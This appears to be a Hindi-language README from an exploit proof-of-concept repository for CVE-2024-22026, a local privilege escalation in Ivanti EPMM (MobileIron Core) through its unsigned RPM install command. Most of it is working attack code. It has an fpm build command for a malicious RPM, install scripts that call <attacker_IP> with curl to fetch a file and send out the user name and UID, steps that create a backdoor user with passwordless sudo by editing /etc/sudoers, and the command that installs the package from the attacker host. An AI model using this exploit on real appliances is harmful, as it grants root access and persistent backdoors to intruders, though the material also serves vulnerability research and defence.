
CVE-2024-22026 के लिए एक्सप्लॉइट POC जो Ivanti EPMM "MobileIron Core" को प्रभावित करता है
Ivanti EPMM "MobileIron Core" को प्रभावित करने वाले CVE-2024-22026 के लिए एक्सप्लॉइट POC

CVE-2024-22026, Ivanti EPMM (पूर्व में MobileIron) सर्वर संस्करण 12.1.0.0, 12.0.0.0 और 11.12.0.1 से पहले के संस्करणों में एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता है। यह भेद्यता एक स्थानीय हमलावर को दूरस्थ URL से एक दुर्भावनापूर्ण RPM पैकेज के साथ सॉफ़्टवेयर अपडेट प्रक्रिया का दोहन करके सिस्टम पर रूट एक्सेस प्राप्त करने की अनुमति देती है।
विस्तृत तकनीकी जानकारी के लिए पूरा ब्लॉग पोस्ट पढ़ें: CVE-2024-22026 का दोहन: Ivanti EPMM (MobileIron Core) को रूट करना
अपने शोध के दौरान, हमने पाया कि उपकरण (appliance) निम्न विशेषाधिकार वाले उपयोगकर्ता के रूप में RPM पैकेज लाने और स्थापित करने के लिए निम्न कमांड का उपयोग करता है:
install rpm url <remote url>
उपरोक्त कमांड केवल निम्नलिखित को चलाने के लिए एक CLI रैपर है, जो रूट के रूप में निष्पादित होता है:
/bin/rpm -Uvh *.rpm
यह अंतर्निहित rpm कमांड किसी भी हस्ताक्षर सत्यापन या URL फ़िल्टरिंग को लागू नहीं करता है, जिसका अर्थ है कि कोई भी RPM पैकेज स्थापित किया जा सकता है। यह एक हमलावर को एक दुर्भावनापूर्ण RPM पैकेज बनाने और वितरित करने की अनुमति देता है जो उपकरण से समझौता कर सकता है।
दुर्भावनापूर्ण RPM पैकेज बनाने के लिए निम्न कमांड का उपयोग किया जाता है:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
preinstall.sh)#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
postinstall.sh)#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:<redacted_password>" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
भेद्यता का दोहन करने के लिए, हमलावर दुर्भावनापूर्ण RPM को लाने और स्थापित करने हेतु CLI में निम्न कमांड चलाएगा:
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
Ivanti ने निम्नलिखित संस्करणों में CVE-2024-22026 को संबोधित करने के लिए पैच जारी किए हैं:
यह रिपॉजिटरी और इसकी सामग्री केवल शैक्षिक और शोध उद्देश्यों के लिए है। यहां निहित जानकारी का उपयोग आपके अपने जोखिम पर किया जाता है।